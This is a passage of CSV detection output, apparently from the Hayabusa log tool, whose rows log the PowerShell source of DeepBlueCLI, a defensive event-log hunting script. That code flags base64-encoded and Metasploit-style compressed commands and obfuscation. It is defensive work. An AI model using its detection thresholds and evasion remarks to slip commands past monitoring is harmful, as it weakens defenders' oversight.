{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.428 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.429 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.430 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.522 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.524 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.525 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:49.697 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.700 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically 
triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. 
(Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. 
$servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. 
$output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
